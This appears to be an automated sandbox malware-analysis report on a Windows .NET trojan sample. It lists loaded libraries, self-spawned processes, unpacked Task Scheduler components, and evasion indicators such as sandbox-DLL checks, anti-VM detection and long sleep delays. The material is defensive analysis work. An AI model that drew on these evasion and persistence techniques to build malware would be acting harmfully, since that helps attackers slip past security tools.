Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01669EB0	2_2_01669EB0

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 0164B970 appears 280 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 016CEA12 appears 86 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 016A7E54 appears 102 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 016DF290 appears 105 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 01695130 appears 58 times

Source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
Source: file.exe, 00000000.00000002.2111813386.00000000026F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
Source: file.exe, 00000000.00000002.2133930517.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
Source: file.exe, 00000000.00000002.2110427135.000000000085E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.2128950880.00000000037D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
Source: file.exe, 00000000.00000002.2128950880.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
Source: file.exe, 00000000.00000002.2132372049.0000000006780000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameZseobxu.dll" vs file.exe
Source: file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
Source: file.exe, 00000000.00000000.2048140594.000000000030C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameYxadnetaxoo.exe, vs file.exe
Source: file.exe, 00000002.00000002.2217688499.000000000174D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameYxadnetaxoo.exe, vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.file.exe.37d4d38.3.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.file.exe.37d4d38.3.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.file.exe.37d4d38.3.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.file.exe.37d4d38.3.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.file.exe.6cb0000.9.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.file.exe.6cb0000.9.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.file.exe.6cb0000.9.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.3732110.1.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.3732110.1.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.file.exe.37d4d38.3.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.file.exe.3732110.1.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.file.exe.3732110.1.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.file.exe.37d4d38.3.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.file.exe.37d4d38.3.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.file.exe.6cb0000.9.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.file.exe.37d4d38.3.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.file.exe.6cb0000.9.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.file.exe.6cb0000.9.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.file.exe.3732110.1.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.file.exe.3732110.1.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.file.exe.6cb0000.9.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.file.exe.6cb0000.9.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.file.exe.37d4d38.3.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.37d4d38.3.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal88.troj.evad.winEXE@3/0@1/1

Source: C:\Users\user\Desktop\file.exe

Mutant created: NULL

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.2133930517.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000037D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000036A1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: file.exe, 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.2133930517.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000037D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000036A1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: file.exe, file.exe, 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.file.exe.37d4d38.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.file.exe.37d4d38.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.file.exe.37d4d38.3.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.file.exe.6cb0000.9.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.file.exe.6cb0000.9.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.file.exe.6cb0000.9.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.file.exe.39a9ce8.0.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.file.exe.39a9ce8.0.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.file.exe.39a9ce8.0.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.file.exe.39a9ce8.0.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.file.exe.39a9ce8.0.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.file.exe.6b40000.8.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.file.exe.6b40000.8.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.file.exe.6b40000.8.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.file.exe.6b40000.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.file.exe.6b40000.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.file.exe.3732110.1.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.file.exe.3732110.1.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.file.exe.3732110.1.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.file.exe.6a50000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2111813386.000000000274A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2133396929.0000000006A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1984, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06951913 push eax; ret	0_2_0695191D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0699976E push es; ret	0_2_06999770
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0699F580 push es; ret	0_2_0699F630
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06999AC6 push es; retf	0_2_06999ADC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06999A02 push es; iretd	0_2_06999A04
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06999889 push es; ret	0_2_06999894
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069A1BAD push BA04B4B4h; retf	0_2_069A1BB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069A18AE push BA04B4B4h; ret	0_2_069A18B3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069C6E87 push es; retf	0_2_069C6E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069C22C7 push es; retf	0_2_069C23A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069C92F0 push esp; retf	0_2_069C92FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069C062D push es; ret	0_2_069C0664
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069C0665 push es; ret	0_2_069C0664
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069C23A5 push es; iretd	0_2_069C23C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069C2325 push es; retf	0_2_069C23A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069C58F3 push es; iretd	0_2_069C5940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069CAC34 push es; ret	0_2_069CAC50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069DB8D8 push es; iretd	0_2_069DB90C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069DB981 push es; iretd	0_2_069DB9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069D9F32 push es; iretd	0_2_069D9F7C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069DB97D push es; iretd	0_2_069DB980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06CA5405 push FFFFFF8Bh; iretd	0_2_06CA5407
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06CA552D push FFFFFF8Bh; iretd	0_2_06CA552F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06CA53EC push FFFFFF8Bh; ret	0_2_06CA53F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06CA53B1 push FFFFFF8Bh; ret	0_2_06CA53B6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06E335AF push esi; retf	0_2_06E335B0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041A81A push ebx; retf	2_2_0041A823
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041F276 push cs; ret	2_2_0041F29C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004192FE push esp; retf	2_2_004192FF
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041F283 push cs; ret	2_2_0041F29C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00423A9F push ecx; iretd	2_2_00423AD4

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: file.exe PID: 1984, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file.exe, 00000000.00000002.2111813386.000000000274A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 26A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2440000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_0169096E rdtsc

2_2_0169096E

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 7373			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 1705			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

API coverage: 0.6 %

Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2992	Thread sleep count: 7373 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2992	Thread sleep count: 1705 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -99657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -99532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -99407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -99282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -99172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -99062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -98953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -98844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -98733s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -98625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -98516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -98405s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -98297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -98188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -98071s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -97932s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -97828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -97719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -97594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -97485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -97360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -97235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -97110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -96985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -96860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -96735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -96610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -96485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -96360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -96235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -96110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -95985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5660	Thread sleep time: -95860s >= -30000s	Jump to behavior
